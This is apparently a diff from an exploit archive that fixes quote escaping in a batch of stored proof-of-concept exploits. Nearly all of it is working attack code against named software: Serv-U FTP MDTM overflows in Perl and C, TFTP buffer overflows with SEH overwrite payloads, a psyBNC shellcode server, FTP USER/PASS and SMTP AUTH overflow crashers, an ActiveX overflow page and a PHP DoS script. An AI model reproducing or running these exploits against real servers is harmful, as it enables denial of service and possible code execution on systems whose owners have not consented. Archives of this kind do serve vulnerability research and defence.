$password = shift || die print \"\\nUsage: <program> <Host> <port> <username> <password> \\n\";
|
||||
$username = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n";
|
||||
$password = shift || die print "\nUsage: <program> <Host> <port> <username> <password> \n";
|
||||
|
||||
## Create Socket
|
||||
my $socket = IO::Socket::INET->new(\"$host:$port\") or die print \"\\nUnable to connect -- $!\\n\";
|
||||
my $socket = IO::Socket::INET->new("$host:$port") or die print "\nUnable to connect -- $!\n";
|
||||
|
||||
print \"connecting...............\\n\\n\";
|
||||
print "connecting...............\n\n";
|
||||
|
||||
connecter($socket);
|
||||
|
||||
|
||||
print \"Server should be stopped\\n\";
|
||||
print "Server should be stopped\n";
|
||||
|
||||
|
||||
## Sub that sends username, password and exploit
|
||||
|
@ -39,20 +39,20 @@ sub connecter{
|
|||
my $socket2 = shift;
|
||||
my $message2 = <$socket2>;
|
||||
chomp $message2;
|
||||
print \"$message2\\n\";
|
||||
print "$message2\n";
|
||||
sleep(5);
|
||||
print $socket2 \"user $username\",CRLF;
|
||||
print $socket2 "user $username",CRLF;
|
||||
$message2 = <$socket2>;
|
||||
chomp $message2;
|
||||
print \"$message2\\n\";
|
||||
print "$message2\n";
|
||||
sleep (5);
|
||||
print $socket2 \"pass $password\", CRLF;
|
||||
print $socket2 "pass $password", CRLF;
|
||||
|
||||
$message2 = <$socket2>;
|
||||
chomp $message2;
|
||||
print \"$message2\\n\";
|
||||
print "$message2\n";
|
||||
sleep (4);
|
||||
print \"Sending MDTM Overflow.....\\n\";
|
||||
print $socket2 \"MDTM 20041111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt\" ,CRLF;
|
||||
print "Sending MDTM Overflow.....\n";
|
||||
print $socket2 "MDTM 20041111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt" ,CRLF;
|
||||
|
||||
}
|
||||
|
|
|
@ -4,7 +4,7 @@ Serv-U FTP Server has been reported prone to a remote stack based buffer overflo
|
|||
|
||||
The problem exists due to insufficient bounds checking. Ultimately an attacker may leverage this issue to have arbitrary instructions executed in the context of the SYSTEM user.
|
||||
|
||||
/* serv-u-mdtm-expl.c - Serv-U \"MDTM\" buffer overflow PoC DoS exploit.
|
||||
/* serv-u-mdtm-expl.c - Serv-U "MDTM" buffer overflow PoC DoS exploit.
|
||||
*
|
||||
* This program will send an overly large filename parameter when calling
|
||||
* the Serv-U FTP MDTM command. Although arbitrary code execution is
|
||||
|
@ -34,9 +34,9 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
|
|||
|
||||
int main(int argc, char *argv[]) {
|
||||
if(argc < 5) {
|
||||
printf(\"Serv-U \'MDTM\' buffer overflow DoS exploit.\\n\");
|
||||
printf(\"by shaun2k2 - <shaunige@yahoo.co.uk>.\\n\\n\");
|
||||
printf(\"Usage: %s <host> <port> <login> <password>\\n\", argv[0]);
|
||||
printf("Serv-U 'MDTM' buffer overflow DoS exploit.\n");
|
||||
printf("by shaun2k2 - <shaunige@yahoo.co.uk>.\n\n");
|
||||
printf("Usage: %s <host> <port> <login> <password>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
|
@ -50,13 +50,13 @@ int main(int argc, char *argv[]) {
|
|||
|
||||
/* lookup IP address of supplied hostname. */
|
||||
if((he = gethostbyname(argv[1])) == NULL) {
|
||||
printf(\"Couldn\'t resolve %s!\\n\", argv[1]);
|
||||
printf("Couldn't resolve %s!\n", argv[1]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
/* create socket. */
|
||||
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
|
||||
perror(\"socket()\");
|
||||
perror("socket()");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
|
@ -65,26 +65,26 @@ int main(int argc, char *argv[]) {
|
|||
dest.sin_port = htons(atoi(argv[2]));
|
||||
dest.sin_addr = *((struct in_addr *)he->h_addr);
|
||||
|
||||
printf(\"Serv-U \'MDTM\' buffer overflow DoS exploit.\\n\");
|
||||
printf(\"by shaun2k2 - <shaunige@yahoo.co.uk>.\\n\\n\");
|
||||
printf("Serv-U 'MDTM' buffer overflow DoS exploit.\n");
|
||||
printf("by shaun2k2 - <shaunige@yahoo.co.uk>.\n\n");
|
||||
|
||||
printf(\"Crafting exploit buffer...\\n\\n\");
|
||||
printf("Crafting exploit buffer...\n\n");
|
||||
/* craft exploit buffers. */
|
||||
memset(bigbuf, \'a\', 6000);
|
||||
sprintf(loginbuf, \"USER %s\\n\", argv[3]);
|
||||
sprintf(passwdbuf, \"PASS %s\\n\", argv[4]);
|
||||
sprintf(explbuf, \"MDTM 20031111111111+%s\\r\\n\", bigbuf);
|
||||
memset(bigbuf, 'a', 6000);
|
||||
sprintf(loginbuf, "USER %s\n", argv[3]);
|
||||
sprintf(passwdbuf, "PASS %s\n", argv[4]);
|
||||
sprintf(explbuf, "MDTM 20031111111111+%s\r\n", bigbuf);
|
||||
|
||||
|
||||
printf(\"[+] Connecting...\\n\");
|
||||
printf("[+] Connecting...\n");
|
||||
if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) < 0) {
|
||||
perror(\"connect()\");
|
||||
perror("connect()");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
printf(\"[+] Connected!\\n\\n\");
|
||||
printf("[+] Connected!\n\n");
|
||||
|
||||
printf(\"[+] Sending exploit buffers...\\n\");
|
||||
printf("[+] Sending exploit buffers...\n");
|
||||
sleep(1); /* give the serv-u server time to sort itself out. */
|
||||
send(sock, loginbuf, strlen(loginbuf), 0);
|
||||
sleep(2); /* wait for 2 secs. */
|
||||
|
@ -92,11 +92,11 @@ int main(int argc, char *argv[]) {
|
|||
sleep(2); /* wait before sending large MDTM command. */
|
||||
send(sock, explbuf, strlen(explbuf), 0);
|
||||
sleep(1); /* wait before closing the socket. */
|
||||
printf(\"[+] Exploit buffer sent!\\n\\n\");
|
||||
printf("[+] Exploit buffer sent!\n\n");
|
||||
|
||||
close(sock);
|
||||
|
||||
printf(\"[+] Done! Check if the Serv-U server has crashed.\\n\");
|
||||
printf("[+] Done! Check if the Serv-U server has crashed.\n");
|
||||
|
||||
return(0);
|
||||
}
|
||||
|
|
|
@ -4,7 +4,7 @@ Serv-U FTP Server has been reported prone to a remote stack based buffer overflo
|
|||
|
||||
The problem exists due to insufficient bounds checking. Ultimately an attacker may leverage this issue to have arbitrary instructions executed in the context of the SYSTEM user.
|
||||
|
||||
/* serv-u-mdtm-expl.c - Serv-U \"MDTM\" buffer overflow
|
||||
/* serv-u-mdtm-expl.c - Serv-U "MDTM" buffer overflow
|
||||
PoC DoS exploit.
|
||||
*
|
||||
* This program will send an overly large filename
|
||||
|
@ -45,12 +45,12 @@ login and password.
|
|||
|
||||
int main(int argc, char *argv[]) {
|
||||
if(argc < 5) {
|
||||
printf(\"Serv-U \'MDTM\' buffer overflow
|
||||
DoS exploit.\\n\");
|
||||
printf(\"by shaun2k2 -
|
||||
<shaunige@yahoo.co.uk>.\\n\\n\");
|
||||
printf(\"Usage: %s <host> <port>
|
||||
<login> <password>\\n\", argv[0]);
|
||||
printf("Serv-U 'MDTM' buffer overflow
|
||||
DoS exploit.\n");
|
||||
printf("by shaun2k2 -
|
||||
<shaunige@yahoo.co.uk>.\n\n");
|
||||
printf("Usage: %s <host> <port>
|
||||
<login> <password>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
|
@ -63,7 +63,7 @@ DoS exploit.\\n\");
|
|||
|
||||
/* lookup IP address of supplied hostname. */
|
||||
if((he = gethostbyname(argv[1])) == NULL) {
|
||||
printf(\"Couldn\'t resolve %s!\\n\",
|
||||
printf("Couldn't resolve %s!\n",
|
||||
argv[1]);
|
||||
exit(-1);
|
||||
}
|
||||
|
@ -71,7 +71,7 @@ argv[1]);
|
|||
/* create socket. */
|
||||
if((sock = socket(AF_INET, SOCK_STREAM, 0)) <
|
||||
0) {
|
||||
perror(\"socket()\");
|
||||
perror("socket()");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
|
@ -81,29 +81,29 @@ argv[1]);
|
|||
dest.sin_addr = *((struct in_addr
|
||||
*)he->h_addr);
|
||||
|
||||
printf(\"Serv-U \'MDTM\' buffer overflow DoS
|
||||
exploit.\\n\");
|
||||
printf(\"by shaun2k2 -
|
||||
<shaunige@yahoo.co.uk>.\\n\\n\");
|
||||
printf("Serv-U 'MDTM' buffer overflow DoS
|
||||
exploit.\n");
|
||||
printf("by shaun2k2 -
|
||||
<shaunige@yahoo.co.uk>.\n\n");
|
||||
|
||||
printf(\"Crafting exploit buffer...\\n\\n\");
|
||||
printf("Crafting exploit buffer...\n\n");
|
||||
/* craft exploit buffers. */
|
||||
sprintf(loginbuf, \"USER %s\\n\", argv[3]);
|
||||
sprintf(passwdbuf, \"PASS %s\\n\", argv[4]);
|
||||
explbuf = \"MDTM
|
||||
20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.txt\";
|
||||
sprintf(loginbuf, "USER %s\n", argv[3]);
|
||||
sprintf(passwdbuf, "PASS %s\n", argv[4]);
|
||||
explbuf = "MDTM
|
||||
20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.txt";
|
||||
|
||||
|
||||
printf(\"[+] Connecting...\\n\");
|
||||
printf("[+] Connecting...\n");
|
||||
if(connect(sock, (struct sockaddr *)&dest,
|
||||
sizeof(struct sockaddr)) < 0) {
|
||||
perror(\"connect()\");
|
||||
perror("connect()");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
printf(\"[+] Connected!\\n\\n\");
|
||||
printf("[+] Connected!\n\n");
|
||||
|
||||
printf(\"[+] Sending exploit buffers...\\n\");
|
||||
printf("[+] Sending exploit buffers...\n");
|
||||
sleep(1); /* give the serv-u server time to
|
||||
sort itself out. */
|
||||
send(sock, loginbuf, strlen(loginbuf), 0);
|
||||
|
@ -114,12 +114,12 @@ command. */
|
|||
send(sock, explbuf, strlen(explbuf), 0);
|
||||
sleep(1); /* wait before closing the socket.
|
||||
*/
|
||||
printf(\"[+] Exploit buffer sent!\\n\\n\");
|
||||
printf("[+] Exploit buffer sent!\n\n");
|
||||
|
||||
close(sock);
|
||||
|
||||
printf(\"[+] Done! Check if the Serv-U server
|
||||
has crashed.\\n\");
|
||||
printf("[+] Done! Check if the Serv-U server
|
||||
has crashed.\n");
|
||||
|
||||
return(0);
|
||||
}
|
||||
|
|
|
@ -17,31 +17,31 @@
|
|||
#!/usr/bin/python
|
||||
import socket
|
||||
import sys
|
||||
host = \\\'192.168.1.32\\\'
|
||||
host = '192.168.1.32'
|
||||
port = 69
|
||||
|
||||
nseh=\\\"\\\\xCC\\\\xCC\\\\xCC\\\\xCC\\\"
|
||||
nseh="\xCC\xCC\xCC\xCC"
|
||||
|
||||
#seh handler overwritten at 261 byte of shellcode but to exception triggered to use it.
|
||||
|
||||
seh=\\\"\\\\x18\\\\x0B\\\\x27\\\" # Breakpoint in no SafeSEH space in Windows XP SP3
|
||||
seh="\x18\x0B\x27" # Breakpoint in no SafeSEH space in Windows XP SP3
|
||||
|
||||
|
||||
payload=\\\"\\\\xCC\\\"*257 + nseh + seh + \\\"\\\\x00\\\" + \\\"3137\\\" + \\\"\\\\x00\\\"
|
||||
payload="\xCC"*257 + nseh + seh + "\x00" + "3137" + "\x00"
|
||||
|
||||
#payload to get access violation:
|
||||
#payload=(\\\"\\\\x00\\\\x01\\\\x25\\\\x32\\\\x35\\\\x25\\\"
|
||||
#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
|
||||
#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
|
||||
#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
|
||||
#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
|
||||
#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
|
||||
#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\"
|
||||
#\\\"\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x25\\\\x35\\\\x63\\\\x2e\\\\x2e\\\\x25\\\\x32\\\\x35\\\\x35\\\"
|
||||
#\\\"\\\\x63\\\\x65\\\\x74\\\\x63\\\\x25\\\\x32\\\\x35\\\\x35\\\\x63\\\\x68\\\\x6f\\\\x73\\\\x74\\\\x73\\\\x00\\\\x6e\\\"
|
||||
#\\\"\\\\x00\\\")
|
||||
#payload=("\x00\x01\x25\x32\x35\x25"
|
||||
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
|
||||
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
|
||||
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
|
||||
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
|
||||
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
|
||||
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
|
||||
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x35"
|
||||
#"\x63\x65\x74\x63\x25\x32\x35\x35\x63\x68\x6f\x73\x74\x73\x00\x6e"
|
||||
#"\x00")
|
||||
|
||||
buffer=\\\"\\\\x00\\\\x01\\\"+ payload + \\\"\\\\x06\\\" + \\\"netascii\\\" + \\\"\\\\x00\\\"
|
||||
buffer="\x00\x01"+ payload + "\x06" + "netascii" + "\x00"
|
||||
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
|
|
|
@ -14,12 +14,12 @@ from socket import *
|
|||
import sys
|
||||
import select
|
||||
|
||||
pwn = \"\\x00\\x02\"
|
||||
pwn += \"\\x66\\x69\\x6c\\x65\\x2e\\x74\\x78\\x74\\x00\"
|
||||
pwn += \"A\"*1200
|
||||
pwn += \"\\x00\"
|
||||
pwn = "\x00\x02"
|
||||
pwn += "\x66\x69\x6c\x65\x2e\x74\x78\x74\x00"
|
||||
pwn += "A"*1200
|
||||
pwn += "\x00"
|
||||
|
||||
address = (\'192.168.200.20\', 69)
|
||||
address = ('192.168.200.20', 69)
|
||||
server_socket = socket(AF_INET, SOCK_DGRAM)
|
||||
|
||||
server_socket.sendto(pwn, address)
|
||||
|
|
|
@ -17,7 +17,7 @@
|
|||
# A vulnerability has been identified in 3CTftpSvc TFTP Server, which could be exploited by attackers
|
||||
# to execute arbitrary commands or cause a denial of service. This flaw is
|
||||
# due to a buffer overflow error when handling an overly long transporting
|
||||
# mode (more than 470 bytes) passed to a \"GET\" or \"PUT\" command, which could
|
||||
# mode (more than 470 bytes) passed to a "GET" or "PUT" command, which could
|
||||
# be exploited by malicious users to compromise a vulnerable system or crash
|
||||
# an affected application.
|
||||
|
||||
|
@ -26,18 +26,18 @@
|
|||
import socket
|
||||
import sys
|
||||
|
||||
host = \'192.168.1.11\'
|
||||
host = '192.168.1.11'
|
||||
port = 69
|
||||
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
except:
|
||||
print \"socket() failed\"
|
||||
print "socket() failed"
|
||||
sys.exit(1)
|
||||
|
||||
filename = \"A\"
|
||||
mode = \"netascii\" + \"A\" * 469
|
||||
da = \"\\x00\\x02\" + filename + \"\\0\" + mode + \"\\0\"
|
||||
filename = "A"
|
||||
mode = "netascii" + "A" * 469
|
||||
da = "\x00\x02" + filename + "\0" + mode + "\0"
|
||||
s.sendto(da, (host, port))
|
||||
|
||||
# milw0rm.com [2006-11-27]
|
||||
|
|
|
@ -2,7 +2,7 @@ source: http://www.securityfocus.com/bid/21612/info
|
|||
|
||||
Multiple applications are prone to a denial-of-service vulnerability.
|
||||
|
||||
A remote attacker may exploit this vulnerability by presenting malicious \'WMV\', \'MID\', and \'AVI\' files to a victim user. When an affected application processes this image, the application crashes, effectively denying service.
|
||||
A remote attacker may exploit this vulnerability by presenting malicious 'WMV', 'MID', and 'AVI' files to a victim user. When an affected application processes this image, the application crashes, effectively denying service.
|
||||
|
||||
It is not known at this time if this issue can be leveraged to execute arbitrary code; this BID will be updated as further information becomes available.
|
||||
|
||||
|
|
|
@ -14,20 +14,20 @@ An attacker can exploit these issues to execute arbitrary code within the contex
|
|||
|
||||
use Socket;
|
||||
|
||||
$retPtr = \"\\x60\\xef\\xff\\xbf\";
|
||||
$retPtr = "\x60\xef\xff\xbf";
|
||||
|
||||
# Pirated from some guy called gunslinger_
|
||||
$exit1code = \"\\x31\\xc0\\xb0\\x01\\x31\\xdb\\xcd\\x80\";
|
||||
$exit1code = "\x31\xc0\xb0\x01\x31\xdb\xcd\x80";
|
||||
|
||||
$code = \"\\x90\" x 120 . $exit1code . $retPtr;
|
||||
$code = "\x90" x 120 . $exit1code . $retPtr;
|
||||
|
||||
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\"tcp\")) or die \"Couldn\'t open socket\";
|
||||
bind(SOCKET, sockaddr_in(6667, inet_aton(\"127.0.0.1\"))) or die \"Couldn\'t bind to port 6667\";
|
||||
listen(SOCKET,5) or die \"Couldn\'t listen on port\";
|
||||
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "Couldn't open socket";
|
||||
bind(SOCKET, sockaddr_in(6667, inet_aton("127.0.0.1"))) or die "Couldn't bind to port 6667";
|
||||
listen(SOCKET,5) or die "Couldn't listen on port";
|
||||
|
||||
while(accept(CLIENT,SOCKET)){
|
||||
sleep 1;
|
||||
select((select(CLIENT), $|=1)[0]);
|
||||
print CLIENT \":-psyBNC!~cjd\\@ef.net PRIVMSG luser : :($code\\r\\n\";
|
||||
print CLIENT ":-psyBNC!~cjd\@ef.net PRIVMSG luser : :($code\r\n";
|
||||
}
|
||||
close(SOCKET);
|
||||
|
|
|
@ -11,10 +11,10 @@
|
|||
*Coded by Marsu <Marsupilamipowa@hotmail.fr> *
|
||||
************************************************************************/
|
||||
|
||||
#include \"winsock2.h\"
|
||||
#include \"stdio.h\"
|
||||
#include \"stdlib.h\"
|
||||
#pragma comment(lib, \"ws2_32.lib\")
|
||||
#include "winsock2.h"
|
||||
#include "stdio.h"
|
||||
#include "stdlib.h"
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
|
||||
int main(int argc, char* argv[])
|
||||
{
|
||||
|
@ -28,58 +28,58 @@ int main(int argc, char* argv[])
|
|||
|
||||
if (argc!=3)
|
||||
{
|
||||
printf(\"[+] Usage: %s <ip> <port>\\n\",argv[0]);
|
||||
printf("[+] Usage: %s <ip> <port>\n",argv[0]);
|
||||
return 1;
|
||||
}
|
||||
WSACleanup();
|
||||
WSAStartup(MAKEWORD(2,0),&wsa);
|
||||
|
||||
printf(\"[+] Connecting to %s:%s ... \",argv[1],argv[2]);
|
||||
printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]);
|
||||
if ((he=gethostbyname(argv[1])) == NULL) {
|
||||
printf(\"Failed\\n[-] Could not init gethostbyname\\n\");
|
||||
printf("Failed\n[-] Could not init gethostbyname\n");
|
||||
return 1;
|
||||
}
|
||||
if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
|
||||
printf(\"Failed\\n[-] Socket error\\n\");
|
||||
printf("Failed\n[-] Socket error\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
sock_addr.sin_family = PF_INET;
|
||||
sock_addr.sin_port = htons(atoi(argv[2]));
|
||||
sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
|
||||
memset(&(sock_addr.sin_zero), \'\\0\', 8);
|
||||
memset(&(sock_addr.sin_zero), '\0', 8);
|
||||
if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
|
||||
printf(\"Failed\\n[-] Sorry, cannot connect to %s:%s. Error: %i\\n\", argv[1],argv[2],WSAGetLastError());
|
||||
printf("Failed\n[-] Sorry, cannot connect to %s:%s. Error: %i\n", argv[1],argv[2],WSAGetLastError());
|
||||
return 1;
|
||||
}
|
||||
printf(\"OK\\n\");
|
||||
memset(recvbuff,\'\\0\',1024);
|
||||
printf("OK\n");
|
||||
memset(recvbuff,'\0',1024);
|
||||
recv(ftpsock, recvbuff, 1024, 0);
|
||||
|
||||
printf(\"[+] Building payload ... \");
|
||||
memset(evilbuff,\'A\',buflen);
|
||||
memset(evilbuff+585,\'B\',4); //eax and edx will be 42424262
|
||||
memcpy(evilbuff,\"USER \",5);
|
||||
memcpy(evilbuff+buflen,\"\\r\\n\\0\",3);
|
||||
printf(\"OK\\n[+] Sending USER ... \");
|
||||
printf("[+] Building payload ... ");
|
||||
memset(evilbuff,'A',buflen);
|
||||
memset(evilbuff+585,'B',4); //eax and edx will be 42424262
|
||||
memcpy(evilbuff,"USER ",5);
|
||||
memcpy(evilbuff+buflen,"\r\n\0",3);
|
||||
printf("OK\n[+] Sending USER ... ");
|
||||
if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
|
||||
printf(\"Failed\\n[-] Could not send\\n\");
|
||||
printf("Failed\n[-] Could not send\n");
|
||||
return 1;
|
||||
}
|
||||
printf(\"OK\\n\");
|
||||
memset(recvbuff,\'\\0\',1024);
|
||||
printf("OK\n");
|
||||
memset(recvbuff,'\0',1024);
|
||||
recv(ftpsock, recvbuff, 1024, 0);
|
||||
|
||||
memcpy(evilbuff,\"PASS \",5);
|
||||
printf(\"[+] Sending PASS ... \");
|
||||
memcpy(evilbuff,"PASS ",5);
|
||||
printf("[+] Sending PASS ... ");
|
||||
if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
|
||||
printf(\"Failed\\n[-] Could not send\\n\");
|
||||
printf("Failed\n[-] Could not send\n");
|
||||
return 1;
|
||||
}
|
||||
printf(\"OK\\n\");
|
||||
printf("OK\n");
|
||||
recv(ftpsock, recvbuff, 1024, 0);
|
||||
|
||||
printf(\"[+] Host should be down\\n\");
|
||||
printf("[+] Host should be down\n");
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
|
|
@ -20,16 +20,16 @@
|
|||
use IO::Socket;
|
||||
use strict;
|
||||
|
||||
my($socket) = \"\";
|
||||
my($socket) = "";
|
||||
|
||||
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
|
||||
|
||||
PeerPort => \"69\",
|
||||
PeerPort => "69",
|
||||
|
||||
Proto => \"UDP\"))
|
||||
Proto => "UDP"))
|
||||
{
|
||||
|
||||
print $socket \"A\" x 517;
|
||||
print $socket "A" x 517;
|
||||
sleep(1);
|
||||
|
||||
|
||||
|
@ -37,7 +37,7 @@ Proto => \"UDP\"))
|
|||
}
|
||||
else
|
||||
{
|
||||
print \"Cannot connect to $ARGV[0]:69\\n\";
|
||||
print "Cannot connect to $ARGV[0]:69\n";
|
||||
}
|
||||
|
||||
# milw0rm.com [2007-03-08]
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
<span style=\"font: 14pt Courier New;\"><p align=\"center\"><b>2007/05/07</b></p></span>
|
||||
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/07</b></p></span>
|
||||
<pre>
|
||||
<code><span style=\"font: 10pt Courier New;\"><span class=\"general1-symbol\">-------------------------------------------------------------------------------------
|
||||
<b>Versalsoft HTTP File Uploader (UFileUploaderD.dll) \'AddFile\' method Buffer Overflow</b>
|
||||
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------
|
||||
<b>Versalsoft HTTP File Uploader (UFileUploaderD.dll) 'AddFile' method Buffer Overflow</b>
|
||||
url: http://en.versalsoft.com/
|
||||
price: from $59.95 to $799.95
|
||||
|
||||
|
@ -13,25 +13,25 @@
|
|||
Try only 1500 characters (or less) to see IE crash.
|
||||
-------------------------------------------------------------------------------------
|
||||
|
||||
<object classid=\'clsid:28776DAD-5914-42A7-9139-8FD7C756BBDD\' id=\'target\' style=\"width: 650px; height: 250px\"></object>
|
||||
<object classid='clsid:28776DAD-5914-42A7-9139-8FD7C756BBDD' id='target' style="width: 650px; height: 250px"></object>
|
||||
|
||||
<input language=VBScript onclick=tryMe() type=button value=\"Click here to start the test\"> <input language=VBScript onclick=QuoteMe() type=button value=\"Quoting...\">
|
||||
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <input language=VBScript onclick=QuoteMe() type=button value="Quoting...">
|
||||
|
||||
<script language=\'vbscript\'>
|
||||
<script language='vbscript'>
|
||||
Sub tryMe
|
||||
on error resume next
|
||||
arg1 = String (4000,\"A\")
|
||||
arg1 = String (4000,"A")
|
||||
target.AddFile arg1
|
||||
End Sub
|
||||
|
||||
Sub QuoteMe
|
||||
Dim MyMsg
|
||||
MyMsg = MsgBox(\"I\'m coming down with a fever\" & vbCrLf & _
|
||||
\"I\'m really out to sea\" & vbCrLf & _
|
||||
\"This kettle is boiling over\" & vbCrLf & _
|
||||
\"I think I\'m a banana tree\", 64, \"2007/05/07 - Versalsoft HTTP File Uploader\")
|
||||
MyMsg = MsgBox("I'm coming down with a fever" & vbCrLf & _
|
||||
"I'm really out to sea" & vbCrLf & _
|
||||
"This kettle is boiling over" & vbCrLf & _
|
||||
"I think I'm a banana tree", 64, "2007/05/07 - Versalsoft HTTP File Uploader")
|
||||
End Sub
|
||||
</script><b><font color=\"#FF0000\">As you can see by the faultmon dump, EIP is overwrite so code execution should
|
||||
</script><b><font color="#FF0000">As you can see by the faultmon dump, EIP is overwrite so code execution should
|
||||
be possible... but I leave to posterity the hardest part of work :)</font color></b>
|
||||
|
||||
11:40:51.172 pid=08E4 tid=0AB0 EXCEPTION (first-chance)
|
||||
|
|
|
@ -24,18 +24,18 @@ length for Name & Password. If attacker inserts a long Name &
|
|||
Password by editing or make his own login page, chat server
|
||||
will crash.
|
||||
*/
|
||||
echo \"Easy Chat Server Remote DoS Exploit\\n\\t\\t\\t\\tby NetJackal\";
|
||||
if($argc<2)die(\"\\nUsage: php dos.php [TARGET] [PORT]\\nExample: php dos.php localhost 80\\n\");
|
||||
echo "Easy Chat Server Remote DoS Exploit\n\t\t\t\tby NetJackal";
|
||||
if($argc<2)die("\nUsage: php dos.php [TARGET] [PORT]\nExample: php dos.php localhost 80\n");
|
||||
$host=$argv[1];
|
||||
$port=$argv[2];
|
||||
$A=str_repeat(\'A\',999);
|
||||
echo \"\\nConnecting...\";
|
||||
$A=str_repeat('A',999);
|
||||
echo "\nConnecting...";
|
||||
$link=fsockopen($host,$port,$en,$es,30);
|
||||
if(!$link)die(\"\\n$en: $es\");
|
||||
echo \"\\nConnected!\";
|
||||
echo \"\\nSending exploit...\";
|
||||
fputs($link,\"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\\r\\nHost: $host\\r\\n\\r\\n\");
|
||||
echo \"\\nWell done!\\n\";
|
||||
if(!$link)die("\n$en: $es");
|
||||
echo "\nConnected!";
|
||||
echo "\nSending exploit...";
|
||||
fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\r\nHost: $host\r\n\r\n");
|
||||
echo "\nWell done!\n";
|
||||
?>
|
||||
|
||||
# milw0rm.com [2007-08-14]
|
||||
|
|
|
@ -14,14 +14,14 @@
|
|||
use IO::Socket;
|
||||
use MIME::Base64;
|
||||
$|=1;
|
||||
$host = \"localhost\";
|
||||
$a = \"QUFB\" x 10000;
|
||||
my $sock = IO::Socket::INET->new(PeerAddr => \"$host\",
|
||||
PeerPort => \'25\',
|
||||
Proto => \'tcp\');
|
||||
print $sock \"EHLO you\\r\\n\";
|
||||
print $sock \"AUTH CRAM-MD5\\r\\n\";
|
||||
print $sock $a . \"\\r\\n\";
|
||||
$host = "localhost";
|
||||
$a = "QUFB" x 10000;
|
||||
my $sock = IO::Socket::INET->new(PeerAddr => "$host",
|
||||
PeerPort => '25',
|
||||
Proto => 'tcp');
|
||||
print $sock "EHLO you\r\n";
|
||||
print $sock "AUTH CRAM-MD5\r\n";
|
||||
print $sock $a . "\r\n";
|
||||
while(<$sock>) {
|
||||
print;
|
||||
}
|
||||
|
|
|
@ -28,9 +28,9 @@ Tested agains: Itunes 8.0.2.20/Quicktime 7.5.5 on XP SP3 fully patched
|
|||
|
||||
================
|
||||
|
||||
\"Many of today\'s leading authoring, multimedia and entertainment applications rely on QuickTime to do the heavy lifting.
|
||||
"Many of today's leading authoring, multimedia and entertainment applications rely on QuickTime to do the heavy lifting.
|
||||
